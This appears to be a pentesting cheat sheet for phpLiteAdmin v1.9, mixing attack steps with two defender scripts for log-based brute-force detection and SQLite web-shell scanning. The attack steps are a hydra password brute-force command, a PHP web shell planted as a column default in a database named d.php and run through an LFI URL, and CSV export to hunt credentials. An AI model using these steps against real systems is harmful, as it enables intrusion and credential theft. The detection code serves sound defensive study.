
phpLiteAdmin

phpLiteAdmin v1.9 – web UI for SQLite databases. Often found under /db/ on HTTPS virtual hosts.

Common path: https://TARGET/db/ or https://TARGET.htb/db/


Discovery

  • Directory bust HTTPS (e.g. gobuster dir -k -u https://TARGET -w ... or feroxbuster).

  • Nikto may flag /db/ ("This might be interesting") and report cookie flag issues (PHPSESSID set without the secure and httponly flags).

  • A PHP warning on the page can leak the filesystem path of the install, e.g. Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114.


Default / weak credentials

Username   Password
admin      (often default or weak; try admin or password123, or brute force)

Brute force (HTTPS POST form):

hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3

Reference: Acunetix – phpLiteAdmin default password
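A defender-side companion to the brute-force step above, added here as an example and not part of the original page or of phpLiteAdmin: it reads combined-format web server access logs and flags sources that POST to the login form at a high rate. Only the login path /db/index.php comes from the page; the log lines, addresses, window and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access log; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/db/index.php"   # phpLiteAdmin login form; deployment path taken from the page


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, login_path=LOGIN_PATH, threshold=10,
                        window=timedelta(minutes=1)):
    """Return {ip: peak_count} for sources whose POSTs to the login page exceed
    `threshold` inside any sliding `window`. The request body (proc_login, the
    password) and the "Incorrect password." text that hydra keys on are not in
    the access log, so the rate of POSTs per source is the usable signal."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] == login_path:
            posts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # shrink the window from the left
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


def constructed_log():
    """Constructed sample: one source hitting the login form every 2 s,
    one ordinary user viewing the page and logging in once, one junk line."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{req}" {status} 512 "-" "{ua}"'
    lines = []
    for i in range(15):
        ts = (base + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="10.0.0.5", ts=ts, req="POST /db/index.php HTTP/1.1",
                                status=200, ua="Mozilla/4.0 (Hydra)"))
    ts = (base + timedelta(seconds=5)).strftime(TS_FMT)
    lines.append(fmt.format(ip="10.0.0.9", ts=ts, req="GET /db/index.php HTTP/1.1",
                            status=200, ua="Mozilla/5.0"))
    ts = (base + timedelta(seconds=40)).strftime(TS_FMT)
    lines.append(fmt.format(ip="10.0.0.9", ts=ts, req="POST /db/index.php HTTP/1.1",
                            status=200, ua="Mozilla/5.0"))
    lines.append("garbage line that should be ignored")
    return lines


if __name__ == "__main__":
    for ip, n in detect_login_bursts(constructed_log()).items():
        print(f"{ip}: {n} login POSTs within one minute")
```

The sliding window is the important part: a fixed per-minute bucket misses a burst that straddles two buckets, while the two-pointer scan finds the densest run of POSTs for each source. Tune `threshold` to the real login volume of the host; a single admin rarely submits the form more than a handful of times per minute.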


RCE: Create PHP database + LFI

If you can create a SQLite database and the server has an LFI that can include files from the path where the DB is stored (e.g. /var/tmp/):

  1. Log in to phpLiteAdmin.

  2. Create a new database named shell.php or d.php (extension must be .php).

  3. Create a table with one TEXT column and set the default value to PHP code. Use double quotes in the payload because this web app uses single quotes in the insertion command: <?php system($_REQUEST["cmd"]); ?>

  4. Example: table name d, column d of type TEXT with default <?php system($_REQUEST["cmd"]); ?> – resulting SQL: CREATE TABLE 'd' ('d' TEXT default '<?php system($_REQUEST["cmd"]); ?>')

  5. Include the DB file via the LFI (adjust the path to match the server; e.g. with the DB stored under /var/tmp/): https://TARGET/manage.php?notes=/validNote/../var/tmp/d.php&cmd=id

Exploit walkthrough: https://github.com/chacka0101/exploits/blob/master/24044.txt
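As an added example (not from the original page, phpLiteAdmin, or the linked walkthrough), a check a defender can run over a directory like the /var/tmp/ mentioned above: it flags files that start with the SQLite magic header but sit under a PHP script extension, and SQLite files whose bytes contain a PHP open tag. The fixture it builds reproduces the shape of the CREATE TABLE statement above with a harmless marker in place of the command; the extension list and the scanned directory are assumptions.

```python
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"      # first 16 bytes of every SQLite 3 file
PHP_OPEN_TAG = b"<?php"
SCRIPT_EXTENSIONS = (".php", ".phtml")    # assumed: extensions the web server hands to PHP


def classify_file(path):
    """Return reasons a file looks like a SQLite database prepared for
    include()-based execution; an empty list means nothing suspicious."""
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    if not data.startswith(SQLITE_MAGIC):
        return reasons                    # not a SQLite file: out of scope here
    if path.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("sqlite database stored under a PHP script extension")
    if PHP_OPEN_TAG in data:
        # Column defaults are kept verbatim in the CREATE TABLE text that SQLite
        # stores in sqlite_master, so a planted tag is visible as plain bytes.
        reasons.append("php open tag embedded in sqlite schema/data")
    return reasons


def scan_directory(directory):
    """Map file name -> reasons for every suspicious regular file in `directory`."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full):
            reasons = classify_file(full)
            if reasons:
                findings[name] = reasons
    return findings


def build_constructed_samples(directory):
    """Constructed fixtures: a benign database, a benign PHP script, and a
    database named d.php whose column default carries a PHP tag (same shape as
    the CREATE TABLE statement above, harmless marker instead of a command)."""
    con = sqlite3.connect(os.path.join(directory, "notes.db"))
    con.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    con.commit()
    con.close()

    with open(os.path.join(directory, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>\n")

    con = sqlite3.connect(os.path.join(directory, "d.php"))
    con.execute("CREATE TABLE 'd' ('d' TEXT default '<?php /* constructed marker */ ?>')")
    con.commit()
    con.close()


def demo():
    """Build the fixtures in a temporary directory and return the scan result."""
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_samples(tmp)
        return scan_directory(tmp)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {'; '.join(reasons)}")
```

Point the scan at the directory phpLiteAdmin writes databases to (its configured directory, or a world-writable location such as /var/tmp/ if that is what the install uses). The extension check alone catches the case described above, while the tag check also catches a database with a harmless-looking name whose schema or rows carry PHP, which an include() would execute regardless of file name.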


Export DB as CSV

You can export the SQLite database as CSV from the UI. Use the export view:

https://TARGET/db/index.php?view=export

Exported tables may contain credentials (e.g. users, sessions, config). Download or view the CSV and search for passwords, API keys, or other sensitive data. The export may also leak paths or PHP notices in the output (e.g. Undefined index: single_table in index.php), which can help with further exploitation.
